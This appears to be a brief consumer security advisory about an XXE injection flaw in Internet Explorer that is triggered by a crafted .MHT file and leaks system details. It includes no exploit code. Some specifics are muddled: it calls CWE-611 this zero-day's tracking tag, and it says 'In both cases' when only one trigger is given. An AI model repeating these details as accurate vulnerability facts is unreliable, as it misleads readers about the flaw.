XXE Injection Description
The XXE Injection Vulnerability affecting Internet Explorer was discovered by vulnerability researchers on April 19th, 2019. The XXE Injection Vulnerability is being tracked under the tag CWE-611 and affects all versions of Microsoft's depreciated Internet Explorer. Unfortunately, IE is being used by many government agencies and banking institutions across the globe, and user caution is advised. The researchers describe CWE-611 as a "zero-day extensible markup language (XML) external entity (XXE) injection vulnerability." The XXE Injection is triggered when a user opens a weaponized .MHT file (MIME HTML Web archive) and loads its content in Internet Explorer. Successfully exploiting the XXE Injection Vulnerability requires users to open a new tab in IE and print the opened page.
In both cases, the attackers receive data on the user's PC that includes IP address, active username, Windows version, installed software and version log, attached peripheral devices (Keyboard, mouse, Webcam, scanners, printer, etc.) and Web browser bookmarks. The data pulled from systems can be used by attackers as reconnaissance information and can help to design second-stage attacks. Knowing your software and hardware configuration, as well as interests based on your Web browser activity can help attackers create a smart attack vector. Microsoft has published XXE Injection Vulnerability saying:
"Internet Explorer alone does not permit this type of malicious behavior. An attacker must trick or convince a user into downloading a malicious document through a socially engineered scheme, for example a spam email attachment or phishing campaign that triggers a download. The file must then be opened with the browser. To guard against this scheme, practice safe computing habits online, such as avoid downloading and opening untrusted files from the Internet."
We recommend users use something different than Internet Explorer and make sure to be vigilant when opening attached files. You may want to take advantage of Yahoo Mail, Gmail, Outlook and other email services providers that boast powerful spam filters.